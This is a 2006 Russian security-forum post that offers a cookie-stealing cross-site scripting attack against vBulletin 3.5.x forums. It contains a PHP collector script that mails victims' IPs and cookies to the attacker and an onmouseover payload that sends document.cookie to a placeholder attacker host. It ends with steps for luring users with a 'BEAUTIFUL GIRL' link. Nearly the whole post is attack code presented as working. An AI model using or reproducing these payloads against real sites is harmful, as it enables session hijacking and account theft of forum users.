HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )
  #1  
Старый 20.04.2006, 18:06
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )
работает отлично!

Код:
( 1 ) 

-------------------------------------------------------------------- 

Name file:  exploit.php 

-------------------------------------------------------------------- 


<?php 
$ip_adresse = $_SERVER['REMOTE_ADDR']; 
if(!empty($ip_adresse)) 
{ 
echo 'il tuo ip и: ',$ip_adresse; 
} 
else 
{ 
echo 'Impossible d\'afficher l\'IP'; 
} 
?> 

<a href="log.php"></a><? 
$xx1=$HTTP_SERVER_VARS['SERVER_PORT']; 
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time()); 
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR; 
else $visitor_info = $REMOTE_HOST; 
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF; 
$x1=`host $REMOTE_ADDR|grep Name`; 
$x2=$REMOTE_PORT; 
?> 

<?php 
$cookie = $_GET['c']; 
?> 

<?php 
$myemail = "YOUR ADDRESS E-MAIL"; 
$today = date("l, F j, Y, g:i a") ; 
$subject = "Xss Vbulletin" ; 
$message = "Xss: Hacking 
Ip: $ip_adresse 
Cookie: $cookie 
Url: $base 
porta usata: $xx1 
remote port: $x2 
Giorno & Ora : $today  \n 
"; 
$from = "From: $myemail\r\n"; 
mail($myemail, $subject, $message, $from); 
?> 



-------------------------------------------------------------------- 

<?php 
$myemail = "YOUR ADDRESS E-MAIL"; 

-------------------------------------------------------------------- 


( 2 ) 

-------------------------------------------------------------------- 

Name file:  image.gif 

-------------------------------------------------------------------- 


<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' > 


-------------------------------------------------------------------- 

location="http://YOUR ADDRESS WEB.com 

-------------------------------------------------------------------- 


( 3 ) 

-------------------------------------------------------------------- 

Like Using 
-------------------------------------------------------------------- 

1°  new thread 
2°  <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> ' 
3°  Submit 
4°  It waits for 

--------------------------------------------------------------------
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
vBulletin v3.5.4 micle Уязвимости CMS / форумов 3 15.04.2006 23:47
Уязвимости форумов phpbb 2.0.15 exbbxak Уязвимости CMS / форумов 105 10.08.2005 20:19
Действующие уязвимости почтовых систем РФ Maxmen Уязвимости Mail-сервис 16 12.12.2004 16:48
Уязвимости Vbulletin и здешний форум Монгол Уязвимости CMS / форумов 6 03.12.2004 15:27
Взлом wmshop Xalegi Уязвимости 0 29.11.2004 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ